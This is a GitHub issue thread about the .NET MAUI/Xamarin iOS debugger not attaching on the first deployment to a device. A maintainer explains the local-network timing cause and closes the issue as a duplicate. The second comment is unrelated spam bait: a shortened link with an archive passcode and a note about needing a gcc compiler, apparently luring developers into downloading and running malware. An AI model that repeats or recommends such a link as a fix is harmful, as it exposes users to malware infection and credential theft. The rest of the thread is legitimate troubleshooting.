### ISSUE TITLE
Debugger does not work on initial deployment to iOS device

### ISSUE THREAD

**Issue by thisisthekap** [xamarin/xamarin-macios#21186] opened 2024-09-05 13:29 UTC
### Apple platform

iOS

### Framework version

net8.0-*

### Affected platform version

8.0.401

### Description

The debugger does not work in Visual Studio Code or JetBrains Rider on initial deployment to an iOS device (tested both).

### Steps to Reproduce

1. `git clone https://github.com/thisisthekap/mauiiosloggingissue`
2. Place breakpoint on MainPage.xaml.cs:16
3. Deploy to device
4. Press button --> no breakpoint hit
5. Stop execution
6. Deploy to device (without removing the app from the device)
7. Press button --> breakpoint is hit

**Comment by sanketkorde** [comment] 2024-09-05 13:29
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by rolfbjarne** [comment] 2024-09-06 18:47
Do you get a dialog about permitting access to the local network upon starting the first time?

If so, this is kind of expected, because debugging happens over the local network.

**Comment by thisisthekap** [comment] 2024-09-06 22:28
The dialog appears, and I always allow it immediately. But the debugger is not connecting anyways.

**Comment by rolfbjarne** [comment] 2024-09-09 13:46
> The dialog appears, and I always allow it immediately. But the debugger is not connecting anyways.

Yes, once the app has launched it's too late to establish the connection with the debugger, which is why it only works after re-launching the app.

The workaround is to connect over the USB cable, but that's not implemented for VSCode (https://github.com/microsoft/vscode-dotnettools/issues/1081), so closing this as a duplicate of the VSCode issue.

**Closed by rolfbjarne** 2024-09-09 13:46 UTC
Labels: need-attention
